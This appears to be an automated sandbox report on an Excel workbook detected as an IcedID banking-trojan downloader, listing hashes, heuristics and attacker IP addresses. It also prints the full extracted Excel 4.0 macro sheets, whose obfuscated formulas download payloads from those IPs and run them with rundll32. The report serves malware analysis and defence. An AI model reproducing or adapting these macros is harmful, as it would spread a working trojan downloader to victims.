IcedID Office (OOXML) malware analysis — malicious · f93afd27e09b5463

MALICIOUS

Office (OOXML)

170.6 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-04-10

MD5: 3c0213e0f62f1607ae40f00a38376764 SHA-1: d1bc19f61c1e6353de68c9a163721262b9031651 SHA-256: f93afd27e09b5463d40a60db231af1b9ef8238823769327612e01f5574cbc1fb

242 Risk Score

Malware Insights

IcedID · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The file contains Excel 4.0 macros, including an Auto_Open defined name, which is a strong indicator of malicious intent. The macros utilize dangerous functions like FORMULA.FILL, GOTO, RETURN, and EXEC to download and execute payloads from the provided URLs. The ClamAV detection of 'Xls.Downloader.IcedID' further supports this assessment, indicating the sample is a downloader for the IcedID banking trojan.

Heuristics 5

ClamAV: Xls.Downloader.IcedID-9f1f1d193a2a2a2b-9951463-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Downloader.IcedID-9f1f1d193a2a2a2b-9951463-0
Excel 4.0 macro sheet (2 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEET

Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAME

Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
Dangerous XLM formula APIs: FORMULA.FILL, GOTO, RETURN, EXEC critical OOXML_XLM_DANGEROUS_FN

Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://188.127.224.61/ Referenced by macro
- http://185.250.148.251/Referenced by macro
- http://195.123.214.149/Referenced by macro
- http://schemas.openxmlformats.org/spreadsheetml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2014/revisionIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2015/revision2In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision3In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision6In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`xlm_sheet_00.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet1.xml	5720 bytes
SHA-256: `beaf3ffbc0c1fe0940b468bbe018294b2e9df57ed661175b2b23a1d74554dc29`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{00000000-0001-0000-0100-000000000000}"><dimension ref="A1:AU402"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"><selection activeCell="A44" sqref="A44"/></sheetView></sheetViews><sheetFormatPr defaultColWidth="6.5546875" defaultRowHeight="14.4" x14ac:dyDescent="0.3"/><cols><col min="1" max="16384" width="6.5546875" style="2"/></cols><sheetData><row r="1" spans="1:1" x14ac:dyDescent="0.3"><c r="A1" s="3"/></row><row r="87" spans="34:34" x14ac:dyDescent="0.3"><c r="AH87" s="2" t="s"><v>19</v></c></row><row r="99" spans="37:38" x14ac:dyDescent="0.3"><c r="AL99" s="2" t="s"><v>0</v></c></row><row r="100" spans="37:38" x14ac:dyDescent="0.3"><c r="AL100" s="2" t="s"><v>1</v></c></row><row r="101" spans="37:38" x14ac:dyDescent="0.3"><c r="AL101" s="2" t="s"><v>5</v></c></row><row r="102" spans="37:38" x14ac:dyDescent="0.3"><c r="AL102" s="2" t="s"><v>3</v></c></row><row r="103" spans="37:38" x14ac:dyDescent="0.3"><c r="AL103" s="2" t="s"><v>6</v></c></row><row r="104" spans="37:38" x14ac:dyDescent="0.3"><c r="AL104" s="2" t="s"><v>4</v></c></row><row r="105" spans="37:38" x14ac:dyDescent="0.3"><c r="AK105" s="2" t="s"><v>14</v></c><c r="AL105" s="2" t="s"><v>7</v></c></row><row r="106" spans="37:38" x14ac:dyDescent="0.3"><c r="AK106" s="2" t="s"><v>14</v></c><c r="AL106" s="2" t="s"><v>3</v></c></row><row r="107" spans="37:38" x14ac:dyDescent="0.3"><c r="AK107" s="2" t="s"><v>15</v></c><c r="AL107" s="2" t="s"><v>8</v></c></row><row r="108" spans="37:38" x14ac:dyDescent="0.3"><c r="AK108" s="2" t="s"><v>15</v></c><c r="AL108" s="2" t="s"><v>9</v></c></row><row r="109" spans="37:38" x14ac:dyDescent="0.3"><c r="AK109" s="2" t="s"><v>16</v></c><c r="AL109" s="2" t="s"><v>10</v></c></row><row r="110" spans="37:38" x14ac:dyDescent="0.3"><c r="AK110" s="2" t="s"><v>16</v></c><c r="AL110" s="2" t="s"><v>3</v></c></row><row r="111" spans="37:38" x14ac:dyDescent="0.3"><c r="AL111" s="2" t="s"><v>11</v></c></row><row r="112" spans="37:38" x14ac:dyDescent="0.3"><c r="AK112" s="2" t="s"><v>17</v></c><c r="AL112" s="2" t="s"><v>12</v></c></row><row r="113" spans="37:38" x14ac:dyDescent="0.3"><c r="AL113" s="2" t="s"><v>7</v></c></row><row r="114" spans="37:38" x14ac:dyDescent="0.3"><c r="AL114" s="2" t="s"><v>13</v></c></row><row r="115" spans="37:38" x14ac:dyDescent="0.3"><c r="AL115" s="2" t="s"><v>18</v></c></row><row r="117" spans="37:38" x14ac:dyDescent="0.3"><c r="AK117" s="2" t="s"><v>2</v></c></row><row r="262" spans="41:41" x14ac:dyDescent="0.3"><c r="AO262" s="2" t="str"><f>NOW()&".dat"</f><v>44273,4828008102.dat</v></c></row><row r="264" spans="41:41" x14ac:dyDescent="0.3"><c r="AO264" s="2" t="b"><f>NOW()=NOW()=NOW()=FORMULA.FILL(AL99&"u"&"n"&"d"&"l"&"l"&"3"&"2 ",AP264)=NOW()=NOW()=NOW()</f><v>0</v></c></row><row r="265" spans="41:41" x14ac:dyDescent="0.3"><c r="AO265" s="2" t="b"><f>NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=FORMULA.FILL(","&AL101&AL113&AL113&AL99&AL114&"g"&"i"&"s"&"t"&"e"&"r"&"S"&"e"&"r"&"v"&"e"&"r",AP265)=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()</f><v>0</v></c></row><row r="271" spans="41:41" x14ac:dyDescent="0.3"><c r="AO271" s="2" t="b"><f>NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=""&""&REGISTER("U"&AL99&AL100&AK117&AL110&AL104,"U"&AL99&AL100&AL101&AL102&AL103&AL104&AL105&AL106&AL107&AL108&AL109&AL110&AL111&AL112&AL113&AL114&AL115,AK105&AK106&AK107&AK108&AK109&AK110,AK112,,1,9)=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()</f><v>0</v></c></row><row r="272" spans="41:41" x14ac:dyDescent="0.3"><c r="AO272" s="2" t="e"><f>NOW()=NOW()=NOW()=HERTY(0,AH87&Z400&AO262,"..\Fol.doka",0,0)</f><v>#NAME?</v></c></row><row r="273" spans="41:47" x14ac:dyDescent="0.3"><c r="AO273" s="2" t="e"><f>NOW()=NOW()=NOW()=HERTY(0,AH87&Z401&AO262,"..\Fol.doka1",0,0)</f><v>#NAME?</v></c></row><row r="274" spans="41:47" x14ac:dyDescent="0.3"><c r="AO274" s="2" t="e"><f>NOW()=NOW()=NOW()=HERTY(0,AH87&Z402&AO262,"..\Fol.doka2",0,0)</f><v>#NAME?</v></c></row><row r="277" spans="41:47" x14ac:dyDescent="0.3"><c r="AO277" s="2"><f>GOTO(sheet2!X212)</f><v>0</v></c></row><row r="281" spans="41:47" x14ac:dyDescent="0.3"><c r="AU281" s="2" t="b"><f>RETURN()</f><v>0</v></c></row><row r="400" spans="26:26" x14ac:dyDescent="0.3"><c r="Z400" s="2" t="s"><v>20</v></c></row><row r="401" spans="26:26" x14ac:dyDescent="0.3"><c r="Z401" s="2" t="s"><v>21</v></c></row><row r="402" spans="26:26" x14ac:dyDescent="0.3"><c r="Z402" s="2" t="str"><f>"195.123.214.149/"</f><v>195.123.214.149/</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/><drawing r:id="rId2"/></xm:macrosheet>
`xlm_sheet_01.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet2.xml	2124 bytes
SHA-256: `24891294ef37aa1a32df25cf488687c1f0e2acd16ce43be5b9a0be75f6fdd1ba`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{00000000-0001-0000-0200-000000000000}"><dimension ref="X213:X220"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"><selection activeCell="A44" sqref="A44"/></sheetView></sheetViews><sheetFormatPr defaultColWidth="5.77734375" defaultRowHeight="14.4" x14ac:dyDescent="0.3"/><cols><col min="1" max="16384" width="5.77734375" style="2"/></cols><sheetData><row r="213" spans="24:24" x14ac:dyDescent="0.3"><c r="X213" s="2" t="b"><f>NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=EXEC(sheet1!AP264&"..\Fol.doka"&sheet1!AP265)=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()</f><v>0</v></c></row><row r="214" spans="24:24" x14ac:dyDescent="0.3"><c r="X214" s="2" t="b"><f>NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=EXEC(sheet1!AP264&"..\Fol.doka1"&sheet1!AP265)=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()</f><v>0</v></c></row><row r="215" spans="24:24" x14ac:dyDescent="0.3"><c r="X215" s="2" t="b"><f>NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=EXEC(sheet1!AP264&"..\Fol.doka2"&sheet1!AP265)=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()</f><v>0</v></c></row><row r="220" spans="24:24" x14ac:dyDescent="0.3"><c r="X220" s="2" t="b"><f>GOTO(sheet1!AU279)</f><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/><drawing r:id="rId2"/></xm:macrosheet>

Open this report in the interactive analyzer, or submit your own file for analysis.